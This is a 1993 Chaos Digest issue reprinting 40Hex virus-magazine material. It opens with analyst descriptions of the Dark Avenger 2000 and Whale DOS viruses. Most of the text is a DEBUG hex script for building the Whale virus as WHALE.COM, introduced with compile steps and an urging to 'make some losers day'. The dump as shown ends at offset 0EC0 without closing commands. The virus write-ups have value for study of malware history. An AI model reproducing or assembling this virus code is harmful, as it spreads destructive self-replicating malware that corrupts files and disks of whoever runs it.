Chaos Digest           Mercredi 19 Mai 1993        Volume 1 : Numero 28
                          ISSN  1244-4901

       Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
       Archiviste: Yves-Marie Crabbe
       Co-Redacteurs: Arnaud Bigare, Stephane Briere

TABLE DES MATIERES, #1.28 (19 Mai 1993)
File 1--40H VMag Issue 1 Volume 2 #005(2)-006(1) (reprint)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
                linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following informations:
                    X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found on some French BBS.  Back issues of
ChaosD can be found on the Internet as part of the Computer underground
Digest archives.  They're accessible using anonymous FTP from:

        * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
        * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
        * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
        * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
        * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
        * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
        * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission.  Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications.  Articles are preferred to short responses.  Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
            the views of the moderators. Chaos Digest contributors
            assume all responsibility for ensuring that articles
            submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Issue 1 Volume 2 #005(2)-006(1) (reprint)


Part III - DARK AVENGER 2000
----------------------------

Date:    02 Feb 90 10:49:00 +0700
From:    Vesselin Bontchev

This virus is also "made in Bulgaria" and again I am indirectly the cause of
its creation.  I am a well known "virus-buster" in Bulgaria and my antivirus
programs are very widely used.  Of course, virus designers didn't like it.
So their next creation...  causes trouble to my antivirus programs.

This virus is exactly 2000 bytes long and I think that it was created by the
author of the Eddie (Dark Avenger) virus.  The programming style is the same
and there are even pieces of code which are the same.

The virus acts much like the Eddie one --- it installs resident in memory by
manipulating the memory control blocks; infects COMMAND.COM at the first run;
infects both .COM- and .EXE-files; infects files when one executes them as
well as when one copies them.

However, there are some extras added.  First, the virus is able to fetch the
original INT 13h vector just like the V512 one (by using the same
undocumented function --- tricks spread fast between virus programmers).

Second, it intercepts the find-first (FCB) and find-next (FCB) functions --
just like V651 (aka EDDIE II) (and contains the same bugs), so you won't see
the increased file lengths in the listing displayed by the DIR command.

Third, it contains the string "Copyright (C) 1989 by Vesselin Bontchev", so
people may think that I am the author of this virus.  In fact, the virus
searches every program being executed for this string (the case of the
letters does not matter) and if found, hangs the system.  It is not necessary
to tell you that all my antivirus programs contain this string.  Of course,
now I will have to use some kind of encryption, just to prevent such tricks.

Vesselin Bontchev reported in May 1990:

The V2000 virus (DARK AVENGER 2000)
===================================

- It turned out that the example of this virus I sent to some of the
antivirus researchers was not the original version.  The original contains
the string "Only the Good die young..." instead of the "Copy me - I want to
travel" message.  Also a small piece of code in the original version was
patched to contain the "666" string. (That is, the version you have contains
this string, the original does not.)

- There exists also a small mutation of the version you have.  The only
difference is that the C' character in the word "Copy" was changed to Z'.

- When describing the V2000 virus, I stated that it halts the computer if you
run a program which contains the string "Copyright (c) 1989 by Vesselin
Bontchev". This is not quite correct. In fact, the programs are only checked
for the "Vesselin Bontchev" part of the string.

- I obtained John McAfee's program Clean, version 60.  In the accompanying
documentation he states about the V2000 virus that "The virus is very
virulent and has caused system crashes and lost data, as well as causing some
systems to become non-bootable after infection".  This is not very correct,
or at least, there is much more to be said.  The virus is exactly as virulent
as the Dark Avenger virus, and for the same reason.  It infects files not
only when one executes them, but also when one reads or copies them. This is
achieved exactly in the same manner as in the Dark Avenger.  The systems
become non-bootable when the virus infects the two hidden files of the
operating system - it cannot distinguish them from the regular .COM files.
By the way, the Dark Avenger virus often causes the same effect.  And at
last, but not least (:-)), the virus is highly destructive - just as the Dark
Avenger is.  It destroys the information on a randomly selected sector on the
disk once in every 16 runs of an infected program. The random function is
exactly the same, and the counters (0 to 15 and for the last attacked sector)
are exactly the same and on the same offsets in the boot sector as with the
Dark Avenger virus.  The main difference is that the destroyed sector is
overwritten not with a part of the virus body, but with the boot sector
instead.  This makes a bit more difficult to discover which files are
destroyed - the boot sector is contained in many "good" programs, such as
FORMAT, SYS, NDD.  Also, the nastiest thing - the damage function is not
performed via INT 26h (which can be intercepted).  The virus determines the
address of the device driver for the respective disk unit (using an
undocumented DOS function call, of course.  I begin to wonder if Ralf Brown
did any good when he made the information in the INTERxyy file available :)).
Then it performs a direct call to that address.  The device driver in DOS
does its work and issues the appropriate INT 13h.  However the virus has
scanned the controllers' ROM space and has determined the original address of
the interrupt handler - just as the Dark Avenger virus does.  Then it has
temporary replaced the INT 13h vector with the address of this handler.  The
result is that the damage function cannot be intercepted.

- Also this virus (unlike Dark Avenger) supports PC-DOS version 4.0 and will
work (and infect) under it.

- The bytes 84 A8 A0 AD A0 20 8F 2E in the virus body are the name "Diana
P.", this time written in cyrillics.

                                                           Unknown Source

+++++

40Hex Volume 1 Issue 2                                                  0006

                            The Whale Virus

     Oh yes here it is, the biggest and meanest virus around.  First
     before you go and compile it read what Patti thinks of it.


Aliases:     Mother Fish, Stealth Virus, Z The Whale
V Status:    Research
Discovered:  August, 1990
Symptoms:    .COM & .EXE growth; decrease in available memory;
             system slowdown; video flicker; slow screen writes;
             file allocation errors; simulated system reboot
Origin:      Hamburg, West Germany
Eff Length:  9,216 Bytes
Type Code:   PRhA - Parasitic Resident .COM & .EXE Infector
Detection Method: ViruScan V67+, Pro-Scan 2.01+, NAV, IBM Scan 2.00+
Removal Instructions:  Scan/D, CleanUp V67+, Pro-Scan 2.01+,
             or Delete infected files
General Comments:

The Whale Virus was submitted in early September, 1990.  This virus had been
rumored to exist since the isolation of the Fish 6 Virus in June, 1990.  It
has been referred to by several names besides Whale, including Mother Fish
and Z The Whale.  The origin of this virus is subject to some speculation,
though it is probably from Hamburg, West Germany due to a reference within
the viral code once it is decrypted.

The first time a program infected with the Whale Virus is executed, the Whale
will install itself memory resident in high system memory but below the 640K
DOS boundary.  On the author's XT clone, the virus always starts at address
9D90.  Available free memory will be decreased by 9,984 bytes.  Most
utilities which display memory usage will also indicate a value for total
system memory which is 9,984 bytes less than what is actually installed.

The following text string can be found in memory on systems infected with the
Whale virus:

                             "Z THE WHALE".

Immediately upon becoming memory resident, the system user will experience
the system slowing down.  Noticeable effects of the system slowdown include
video flicker to extremely slow screen writes.  Some programs may appear to
"hang", though they will eventually execute properly in most cases since the
"hang" is due to the slowing of the system.

When a program is executed with the Whale memory resident, the virus will
infect the program.  Infected programs increase in length, the actual change
in length is usually 9,216 bytes.  Note the "usually": this virus does
occasionally infect a program with a "mutant" which will be a different
length.  If the file length increase is exactly 9,216 bytes, the Whale will
hide the change in file length when a disk directory command is executed.
If the file length of the viral code added to the program is other than 9,216
bytes, the file length displayed with the directory command will either the
actual infected file length, or the actual infected file length minus 9,216
bytes.

Executing the DOS CHKDSK program on infected systems will result in file
allocation errors being reported.  If CHKDSK /F is executed, file damage
will result.

The Whale also alters the program's date/time in the directory when the file
is executed, though it is not set to the system date/time of infection.
Occasionally, Whale will alter the directory entry for the program it is
infecting improperly, resulting in the directory entry becoming invalid.
These programs with invalid directory entries will appear when the directory
is listed, but some disk utilities will not allow access to the program.
In these cases, the directory entry can be fixed with Norton Utilities FD
command to reset the file date.

The Whale occasionally will change its behavior while it is memory resident.
While most of the time it only infects files when executed, there are periods
of time when it will infect any file opened for any reason.  It will also, at
times, disinfect files when they are copied with the DOS copy command, at
other times it will not "disinfect on the fly".

Occasionally, the Whale Virus will simulate what appears to be a system
reboot.  While this doesn't always occur, when it does occur the Break key
is disabled so that the user cannot exit unexpectedly from the execution of
the system's AutoExec.Bat file.  If the AutoExec.Bat file contained any
software which does file opens of other executable programs, those opened
executable programs will be infected at that time if they were not previously
infected.  Typically, files infected in this manner will increase by 9,216
bytes though it will not be shown in a directory listing.

A hidden file may be found in the root directory of drive C: on infected
files.  This file is not always present, the virus will sometimes remove it,
only to recreate it again at a later time.  The name of this hidden file is
FISH-#9.TBL, it contains an image of the hard disk's partition table along
with the following message:

        "Fish Virus #9
         A Whale is no Fish!
         Mind her Mutant Fish
         and the hidden Fish Eggs
         for they are damaging.
         The sixth Fish mutates
         only if the Whale is in
         her Cave."

After the discovery of this hidden file, the author of this document made
several attempt to have the Fish 6 Virus mutate by introducing it and Whale
into a system.  Under no circumstances did a mutation of either virus result,
the resultant files were infected with both an identifiable Fish 6 infection
and a Whale infection.

Whale is hostile to debuggers and contains many traps to prevent successful
decryption of the virus.  One of its "traps" is to lock out the keyboard if
it determines a debugger is in use.

        Here's a side note by the author of F-Prot


                             Whale

This is a recent, rather remarkable virus.  It is long, 9216 bytes and
able to infect COM and EXE files.  The increase in file size is not
visible though, while the virus is active in memory, as it uses several
advanced "stealth" methods.  Other effects of the virus are not known,
but one infected program displayed the following message when run:

             THE WHALE IN SEARCH OF THE 8 FISH
             I AM 'knzyvo ' IN HAMBURG addr error D9EB,02

Most of the virus is devoted to encryption and code which moves blocks of
virus code around.  This overhead results in a considerable slowdown of
infected systems.


     And here it is.  Use your editor to copy the below machine language
     script to a file called WHALE.SCR  Next use DEBUG to make it into a
     COM file.  Use the command  DEBUG < WHALE.SCR   When it gets done
     you'll see a file called WHALE.COM.  There it is, have fun - and
     make some losers day!

---------------------------------------------------------------------------

n whale.com
e 0100  E9 C9 23 01 F5 21 E1 02 C0 00 D2 07 FF FF 99 14
e 0110  00 E9 B8 23 CD 20 8D 01 BD 00 E1 02 C0 00 D2 07
e 0120  FF FF 99 14 FE FF E3 8F 01 00 99 14 1E 00 00 00
e 0130  26 FB 5A 26 47 48 63 33 57 6E 52 4C 63 3D FF 10
e 0140  D4 06 75 EC 06 7E 17 75 25 FA 03 24 3D 8B 21 90
e 0150  C3 24 67 2A 08 12 07 C4 E0 5B 08 9C 06 E1 15 66
e 0160  03 7B 25 7D D4 06 4E 36 9C 08 90 C3 24 D4 06 4C
e 0170  36 FF 38 D4 06 4A 36 35 02 40 C7 20 7D 25 E5 13
e 0180  C7 20 48 25 26 34 C3 77 3D 8B 29 3D 8B 38 48 81
e 0190  E5 5C 01 BA 1D 53 AF CD CF CF 22 02 D9 A7 29 27
e 01A0  4A 2E D9 14 2E 05 24 5F D5 B7 EB 38 1D 1F CE BF
e 01B0  FF CC 4B BB 11 1B 81 11 06 EF A5 D0 02 A7 24 68
e 01C0  63 AD 0A 07 0C E8 A2 14 E8 5E 1A 38 38 E5 68 30
e 01D0  23 BD DB 29 AA 6A 23 92 26 48 3A F5 2C 38 B3 4A
e 01E0  E0 16 AE 59 1C 03 01 88 2C F6 F5 0E 92 3E 22 3A
e 01F0  B1 13 33 1C B7 D8 19 BD 1F FE 0B 4E 1C 0D F6 53
e 0200  0E F6 BD 2D 27 CE 28 09 1C D3 5C BE DE C0 E7 83
e 0210  5D 7A 67 A1 19 CD ED C2 4F 98 C3 2C 3E B6 4E 04
e 0220  D8 FE E4 6A D5 F7 C2 15 C6 AD F7 2A 21 D5 8C C2
e 0230  85 E2 6F ED F5 C2 5F CE A8 F7 28 B6 D3 28 29 D1
e 0240  28 A0 F3 FB CE 9A 1E CE EA 08 14 69 29 5A D9 73
e 0250  B4 0F 79 72 E5 7C D9 4C 54 D5 77 F9 79 47 BC 5A
e 0260  19 5F B6 47 F6 52 1A 5F 72 AE 7C 2D 4C 09 7E 81
e 0270  2F 7D 6E 21 72 AF 7C DB 4C 7A B4 65 5A 6F D0 E9
e 0280  01 09 EA A7 FD 73 27 FA 8B 23 9A F3 CE FB B3 2E
e 0290  3D C4 52 F8 2C C0 D4 48 21 F9 FD FC 90 E0 91 CB
e 02A0  2C 69 C9 EA 6C C9 EB C6 F9 3B D4 FA E0 B8 67 D7
e 02B0  0A 6E C6 D1 0C 4A 39 11 C2 97 D3 C6 0A 1D DB CD
e 02C0  D0 E8 59 1B 39 5E 83 3E 5C 45 F4 50 25 5C B6 55
e 02D0  7A 50 74 66 59 83 17 A1 AD 7E D2 4E 78 B6 CD 7F
e 02E0  FF 2E 5C D0 AB 5E 9B 7D 72 5E E5 A0 5B 7B 78 70
e 02F0  6A 7E 44 6B 56 DE 55 58 5E 6B 83 B6 E0 67 64 66
e 0300  2D CE 2C 08 01 E3 DE 77 E7 F0 75 E3 F1 F8 42 F6
e 0310  D6 40 F2 D7 CD 51 DE E3 53 D2 E2 DE 29 D5 B5 F2
e 0320  D0 30 28 27 A0 F8 42 13 F2 0B AD C9 CB CB CE 01
e 0330  08 31 25 18 11 23 24 10 0B 97 F3 01 18 9B 03 22
e 0340  10 0B B8 06 37 36 F8 65 29 08 3D FF 08 0B 00 76
e 0350  AB 00 26 9D D8 7E 98 1E E1 15 89 38 1F 00 AA 1D
e 0360  0E 26 FB 55 15 C8 89 C3 9D DB A7 75 06 D9 ED A3
e 0370  22 13 8C 28 1D 00 AF 25 0C 26 FB 5B 24 FA F2 28
e 0380  AD BB 8D F8 EF 89 A8 EF 8D B8 BF 99 FC AB CD B8
e 0390  AB 99 F8 EF CD B8 AB DD B8 EB 99 A8 BF 8D F8 2E
e 03A0  A6 1C AB C4 EA E8 F6 0D 51 A0 99 62 44 F8 A7 C8
e 03B0  B9 D9 54 71 95 A7 28 E3 AD EC 60 47 B0 E1 96 71
e 03C0  95 B7 21 DA DF 71 32 CD 99 8A CE 6F CB 92 10 8B
e 03D0  FE FA E8 26 13 5B A5 F8 72 75 9C 06 22 13 0E A9
e 03E0  15 06 26 1D 58 2B 55 F3 76 8E D7 AC EB 01 ED FA
e 03F0  BF 3A 98 07 AD 0B 33 E6 9D D8 CD FB 45 21 30 B8
e 0400  CD 20 64 A8 20 E7 98 85 31 80 18 9C C5 FE 31 7B
e 0410  43 8B 98 43 CD 9F 43 4E 9E 43 03 9E 43 A5 9F 43
e 0420  DF 80 8F E8 3B 14 5A CB 16 FC CA D0 2A CD 66 C8
e 0430  B0 FD 56 FE FD 54 C4 FE C3 F3 D9 99 FE 7D 2E C8
e 0440  1C 1B 22 C8 ED C4 67 EB DA 0A E9 D9 0A E9 DF 1E
e 0450  EB EA 34 EB E8 31 E5 EC 36 EB F6 68 E4 F5 1A E4
e 0460  F4 A0 F3 89 5C F0 80 B3 E7 85 8E F2 84 8E F2 9C
e 0470  F1 F0 88 D0 12 FC D0 62 CD 66 C8 23 C2 ED 23 F6
e 0480  F3 90 3D FF 00 8B 25 70 FA 90 3B FA 65 3B 50 41
e 0490  17 1C 39 29 64 E8 8D 15 1B 7A A7 B2 7A A7 33 7A
e 04A0  A7 68 7A C6 B9 54 B0 6A C9 6B D3 3C 49 01 92 9A
e 04B0  59 92 9A 41 66 DC D7 1A EC 75 CE 95 06 34 6D 50
e 04C0  D7 6B 94 7C 6A 61 07 33 24 01 36 26 C5 85 C7 45
e 04D0  7E 2E D9 35 EA 02 E5 E8 4F 15 28 44 5F EB 62 26
e 04E0  47 6A FD 74 1D 54 6C 53 5F E9 62 2A 47 6A 99 AB
e 04F0  BB 5F EC 52 28 47 6A F8 44 1F 54 4C CF 57 35 61
e 0500  99 E4 59 58 C3 98 BC 34 28 48 53 7C 41 8F 20 FB
e 0510  31 20 0F 26 BE 7E 02 2E F1 18 35 11 28 1F C9 9F
e 0520  05 35 8A 26 B3 23 88 71 D9 47 D7 D0 E8 6F 3B 1D
e 0530  D0 33 E7 50 26 2F 14 E2 DE 98 D9 CE FB 04 20 01
e 0540  45 4D D9 43 89 72 D9 33 05 14 31 00 12 7D 50 AD
e 0550  54 4B 56 08 EC 26 CC 37 E8 CE 16 0E B2 37 95 BC
e 0560  98 2E 74 A6 7C B7 87 7C AD 9A 9B E5 FB D4 23 0A
e 0570  58 78 18 6B A5 C5 9B F4 93 89 9D 9A BB 58 C2 4F
e 0580  58 C7 07 7C 10 5F 96 4B 45 64 D0 E8 93 16 28 97
e 0590  8C 38 B1 F5 94 B9 2E A7 CE 87 BF 80 8C 3A B1 F9
e 05A0  94 B9 4A 26 68 8C 3F 81 FB 94 B9 2B 97 CC 87 9F
e 05B0  1C 84 E6 B2 4A 63 8B 8B C3 CE 94 05 3F 73 7E 10
e 05C0  40 96 C8 AD 52 A2 F8 90 97 95 B1 A0 F8 7C C8 37
e 05D0  62 18 6C 88 F5 6F 7A E5 4B 83 60 1B 07 A1 4D 08
e 05E0  AF C9 87 78 11 81 C8 6B 04 AF E0 81 E5 FC 04 7B
e 05F0  3D FF 92 62 09 7E 26 0C 24 3D 88 21 16 0C 24 DF
e 0600  E9 7B 13 EB CE 2F 05 28 27 DC BC D9 1A ED 31 52
e 0610  37 2D F4 FA 54 28 1D 67 03 CF 6A FE CE 37 05 06
e 0620  34 CF 19 CB CF 05 31 97 01 B4 18 FE 41 21 8B 73
e 0630  21 82 F7 20 2F 14 21 F1 10 D1 46 2C A7 E9 7D 3B
e 0640  20 66 03 CF 4E 01 A6 7C 18 A6 92 7F 3B 13 24 55
e 0650  10 E9 69 12 81 49 0E 00 02 90 5F 39 13 E9 65 12
e 0660  E2 22 FA EC 22 F8 43 CF 2B 02 CE C5 04 2D 4B B0
e 0670  B4 B5 BC 3E 77 18 96 5B 44 72 61 03 CF 33 01 CE
e 0680  D2 04 06 67 C0 50 D7 75 5C 3C F4 BD 77 FA 91 DC
e 0690  74 52 D2 74 E3 66 C2 52 D5 F4 CE 49 8B 4C 4A 50
e 06A0  BA 81 6F 73 60 03 CF E5 00 CE 84 04 D7 00 1D 2A
e 06B0  B4 48 8C 02 13 8F CB 16 1B FF 05 53 25 60 36 E9
e 06C0  CA 35 06 0C BE D8 A7 75 B9 13 37 BA 13 35 2E EC
e 06D0  23 66 36 47 03 FA 98 00 FA F5 00 50 0F 5C 55 7C
e 06E0  53 5B 18 23 2A 1B 54 51 79 00 55 7C 53 5B 15 56
e 06F0  5A 67 55 40 15 23 2A 15 20 52 15 57 7B 54 6C 76
e 0700  15 69 60 15 6E 7C 15 46 7A 46 68 32 15 4D 7A 5B
e 0710  64 33 5D 65 61 15 4D 66 41 61 7D 41 20 55 5C 73
e 0720  7B 15 61 7D 51 20 67 5D 65 33 5D 69 77 51 65 7D
e 0730  15 46 7A 46 68 33 70 67 74 46 20 75 5A 72 33 41
e 0740  68 76 4C 20 72 47 65 33 51 61 7E 54 67 7A 5B 67
e 0750  3D 15 54 7B 50 20 60 5C 78 67 5D 20 55 5C 73 7B
e 0760  15 6D 66 41 61 67 50 73 33 5A 6E 7F 4C 20 7A 53
e 0770  20 44 5D 61 7F 50 20 7A 46 20 7A 5B 20 7B 50 72
e 0780  33 76 61 65 50 0E 0C 81 40 AA AE 00 A9 EF 05 EC
e 0790  23 66 36 47 06 A7 0B FF 05 53 25 FB DE 1A E1 CE
e 07A0  0B FD E5 FB 14 DB FA EC DA FB 97 25 02 0C C2 16
e 07B0  F1 04 E0 1A 4C 3A E4 A9 E2 06 EA F7 C7 30 0D 75
e 07C0  C4 9A D3 D0 54 17 A6 67 DA A6 7C 17 A6 92 6F 36
e 07D0  13 24 A6 4C 12 26 F8 CB C5 3D E8 40 10 0C D2 6E
e 07E0  27 59 90 D5 D9 90 D7 3A 78 EE DF 66 1B CD 07 E8
e 07F0  CE 43 03 2A CA 50 2C 41 9E F3 C0 9E DF 22 50 E5
e 0800  C7 75 23 FB 74 2C 60 4D CF 93 FC CF 50 03 AF 45
e 0810  02 AF 5D 04 CD F7 21 2A 11 E6 07 20 DB 75 AE 20
e 0820  26 0C 89 CF FB 00 26 48 53 7C 1D 58 23 03 00 27
e 0830  D0 33 F5 92 EE AE E8 E8 BE E8 E9 E0 16 EB CF B1
e 0840  06 A1 C0 89 38 17 00 2D DA 74 E6 5A E9 75 13 B9
e 0850  3A 13 53 71 FB E8 CD 11 1E 50 8D 2B AC 8D AA AC
e 0860  4B 89 46 03 53 D9 2B 8E D9 23 8A 4E 37 9E EB 67
e 0870  F5 2F 71 77 B8 77 6C 4F 67 7C CE D5 02 3E A5 3D
e 0880  97 A6 F1 92 F6 3D CF A1 37 63 ED E5 11 56 FF D6
e 0890  A4 6E CB 4D 45 89 BC 74 7B 90 C4 22 FA 04 D9 01
e 08A0  EB B7 9A 16 22 13 8B 38 1F 00 C2 12 0B EF 67 10
e 08B0  1E CA 72 2A 94 DA AF 05 04 26 22 C2 C4 F1 74 2D
e 08C0  92 C6 5E 17 E8 2D E8 E9 8E 1A EA CF 90 02 08 D5
e 08D0  84 6F 19 E8 2D DA 74 D5 9A 1E 2A 13 33 F5 9A 16
e 08E0  22 13 31 F6 B0 0C 26 FA 16 DB 92 C6 B6 27 B9 3A
e 08F0  13 F3 82 20 C9 CE FB 4A 24 5A F8 84 F4 71 08 E5
e 0900  FF 67 CE F8 61 5E DC 2D 4F 47 6B CF F6 C1 60 AD
e 0910  CC 60 BD CE EE F7 FA 68 2A DE CE 08 21 62 AD CC
e 0920  62 BD CE C6 04 FD 68 22 DE 62 AD FD 62 BD FF 52
e 0930  E4 DE 2C BD D0 EA F8 6A CC 71 24 C5 07 C8 8D DD
e 0940  36 AD E1 94 FA 5C D8 28 DE 52 C6 C3 75 90 C6 33
e 0950  A8 7D 33 FB F1 D9 90 C6 24 A8 8B 53 FB E8 D9 90
e 0960  C6 24 A8 81 26 FB DF D9 90 C6 2E A8 08 2C FB D6
e 0970  D9 90 C6 24 A8 2F 16 FB CD D9 90 C6 24 A8 A5 24
e 0980  FB C4 D9 90 C6 78 A8 7D 33 FB BB D9 90 C6 23 A8
e 0990  9F 86 FB B2 D9 90 C6 2C A8 A7 26 FB A9 D9 90 C6
e 09A0  2A A8 2D A1 FB A0 D9 90 C6 24 A8 29 5E FB 97 D9
e 09B0  90 C6 24 A8 29 64 FB 8E D9 90 C6 24 A8 C0 3C FB
e 09C0  85 D9 90 C6 4A A8 14 37 FB 7C D9 90 C6 29 A8 00
e 09D0  26 FB 73 D9 90 C6 2D A8 E3 24 FB 6A D9 48 C3 CE
e 09E0  72 01 0A BA A7 88 05 1C AB 03 8C 8F 33 7F 7C 1E
e 09F0  B7 DD B4 B6 3B B5 13 3A 9E 87 70 AC CF AA 0E B9
e 0A00  A1 45 BF E9 9F 5F 89 76 8D 0F E4 B6 67 C0 B1 A2
e 0A10  67 70 08 D7 1E E3 37 E8 0F 12 27 26 9F C0 A7 F8
e 0A20  00 02 0E 00 26 20 D2 08 98 0E E5 37 49 27 D8 15
e 0A30  26 13 41 D1 E2 89 62 30 92 B5 E4 F1 AF 57 21 CE
e 0A40  54 18 0E FA 5D DB FB FA 26 26 52 9C AF A8 90 60
e 0A50  5E 76 A7 73 C4 43 BA 14 BA DE BC CD 93 4F 80 26
e 0A60  6C 6F DE 72 D5 77 5A C8 4C E6 64 5C 6B A9 52 74
e 0A70  1B D1 B6 50 E2 76 A9 A1 8E A9 6C 8E A9 58 6C 77
e 0A80  C3 E9 FA 06 DC FB E8 9C 13 1A B6 6B 3E 4C 67 B1
e 0A90  92 7E 76 97 AD 55 A0 11 B5 06 81 78 78 79 78 AF
e 0AA0  79 78 53 94 8B E5 FB 80 2E FB 17 2E 61 43 08 93
e 0AB0  3E 84 37 00 52 28 E8 DE 02 83 DD EC 74 15 FB 82
e 0AC0  26 37 84 8C 69 8A 00 B3 8A A5 2E 90 A2 28 D6 86
e 0AD0  A4 44 50 38 AA 03 34 A0 84 1E C1 5C B1 0D FF B1
e 0AE0  0D FC 6B 6C 01 80 A1 08 93 26 95 37 FE CF A0 FC
e 0AF0  CE FA 97 DF FB 4C 26 00 D5 FD C1 3D D8 CE 6C E7
e 0B00  C6 FB 52 65 F1 4C 94 F1 1B B8 C2 E7 E1 AF 53 04
e 0B10  26 1D 4E 26 53 E5 26 E1 56 FE 26 13 E8 05 17 2E
e 0B20  D8 15 A2 02 F8 C1 9D FA 61 DF 2E E8 33 13 0F 7E
e 0B30  FF 77 78 65 A7 68 2D 7D 78 54 5F 96 00 4F 6E D0
e 0B40  E9 34 10 3D F3 05 74 DE 3E EF 34 5D FE E1 FA 99
e 0B50  DB 98 D5 AF F6 BB 75 D0 53 EA AD 01 9D 19 C0 52
e 0B60  10 E9 BE 11 E8 FA EC 4D 74 5F 00 5A CD 54 52 65
e 0B70  7C FD 5F 76 50 6F 97 42 65 76 CD 4F 52 CB B0 76
e 0B80  7A 46 A1 D0 1F 4D CD 11 52 CB 46 77 87 E5 E9 8B
e 0B90  BE BA 52 B8 0F 5A CE 54 92 65 7C FB 47 BA 50 6F
e 0BA0  DD 72 F2 76 7A F9 53 3F 46 CE CF B0 76 5A BE 4C
e 0BB0  41 65 BA A0 57 1C 55 31 2E A5 1D B3 02 12 2E D9
e 0BC0  25 B3 02 3D FF 10 FB 24 08 EC 36 C0 37 55 08 D7
e 0BD0  1E 02 37 89 C3 FA BD DE 9A 04 CE 75 FF 02 29 D2
e 0BE0  5B 2E 34 1B 90 2E 1C 96 68 38 07 9B BF 0D C8 B3
e 0BF0  5C 37 3A EE 7F E2 29 3A 32 D7 3C BE 0D D1 F7 C1
e 0C00  BD 0A 0C 2E E3 25 03 03 90 FE 27 66 40 CE 20 FF
e 0C10  11 01 99 22 1B 12 B7 C3 02 80 50 3C CB 17 74 11
e 0C20  02 C1 1A 88 04 31 24 ED 02 19 12 1A 8E 14 37 24
e 0C30  11 2A 13 12 B7 C2 02 1A 88 0C 35 24 ED 02 15 12
e 0C40  1A 8E 14 CB 25 FA 75 17 2A CF 00 01 2F FA D8 26
e 0C50  FB F0 D8 D7 30 FE C7 C8 FF 24 30 38 11 37 55 C1
e 0C60  CA D5 11 F0 AD 02 30 AF 59 30 FE CD CF AD 50 31
e 0C70  AF 29 30 FE C6 CF AD 70 32 AF 3F 30 FE FF CF AD
e 0C80  73 35 AF 29 30 FE F0 CF AD 26 37 AF 63 30 FE E9
e 0C90  CF AD B3 37 AF 75 30 FE E2 CF AD 13 3A AF 07 30
e 0CA0  FE 9B CF AD 29 3C AF 2D 30 FE 8C CF AD E7 3C AF
e 0CB0  1F 30 FE 85 CF AD 79 20 AF 0E 30 FE BE CF AD 25
e 0CC0  21 AF 0A 30 FE B7 CF AD 29 11 AF 44 30 FE A8 CF
e 0CD0  AD 50 11 AF FB 30 FE A1 CF AD 4F 13 AF 1A 30 FE
e 0CE0  5A CF AD 5E 2D AF 06 30 FE 53 CF AD 5F 2C AF 61
e 0CF0  30 FE 44 CF 2A C3 44 0C 0D F7 10 BB 15 E2 D7 8B
e 0D00  8E 06 AC 18 70 03 D6 AD E8 D1 25 36 16 DC CF FE
e 0D10  FE 26 FE 86 C7 FE 52 25 D3 D0 5B A7 D0 78 24 41
e 0D20  83 CB 11 FF C3 FA DB 26 FB 18 D8 0B 90 3D 87 93
e 0D30  F2 81 C3 3D DF 94 37 70 D8 E5 02 63 FF C5 91 6E
e 0D40  D8 78 F3 96 89 52 7B 0E 39 A9 07 03 FB 74 23 FB
e 0D50  5F 29 3D FE 20 FC 24 CE FB 01 08 ED 0E C9 37 E8
e 0D60  C7 EE 46 FC 7D 8B D2 36 CC 9A EC 32 E1 31 32 62
e 0D70  3E 32 9F 3E 54 27 47 19 D2 36 EC 4F ED F4 03 FF
e 0D80  32 D8 E7 25 CA 2F FE 73 CF D0 FC 46 DC F0 C9 C4
e 0D90  4C EB 1F EA C3 DA 14 1A 2D E3 54 82 D2 42 FC 03
e 0DA0  ED F4 72 DF DB D9 21 3A E8 8E 2E D9 3D 03 03 FB
e 0DB0  91 DB 0D 4C E1 03 4D E1 DF 07 B6 D6 48 E1 DF 01
e 0DC0  B6 D6 08 68 D4 CC 25 83 C5 2E 5B A4 68 4E A4 D2
e 0DD0  4B 53 CD 98 2E E0 97 10 34 FA 5D 9F 17 00 AA C8
e 0DE0  09 CD 9D DB F7 F0 E2 DA 9A C8 9F 0F 00 24 34 43
e 0DF0  C4 E8 50 AD 1C 0E 7E C3 EF CF 0E 04 1A 12 74 36
e 0E00  FA 88 D0 12 CB A7 E8 34 0E 61 F8 A7 E2 21 07 B2
e 0E10  E8 16 EE 28 26 3D 83 28 A0 24 27 3D 8C 20 35 24
e 0E20  08 9A 1E 02 37 E8 B4 E5 2E D9 05 66 03 FB 0C D1
e 0E30  3D C4 38 37 24 00 D6 77 34 FB 4D 32 3A 73 25 FA
e 0E40  9E 26 3D 80 00 A0 24 D8 90 FE 27 67 41 CE E0 FC
e 0E50  3E 13 8B 22 10 44 24 40 8B 7A 17 81 D5 5B 53 A7
e 0E60  E0 49 60 12 D8 7D FB 20 32 0A 75 71 FB D4 DA 08
e 0E70  00 AD 4F 01 AD 93 4B FA 9A 04 AD 93 4D FA 9A 44
e 0E80  24 98 80 69 CF 89 62 17 E8 D8 00 1C CD 26 E8 94
e 0E90  EF 30 26 98 16 3C 13 E8 A9 17 2E AD 1D A3 02 90
e 0EA0  C1 36 12 CA 00 9A 57 32 B2 18 26 35 89 61 01 A1
e 0EB0  34 13 03 E7 35 89 61 03 A1 32 13 26 AF 54 0E CE
e 0EC0  D4 13 17 FB 7D DA 0B 00 CE 4D 04 08 9D 1E 85 37
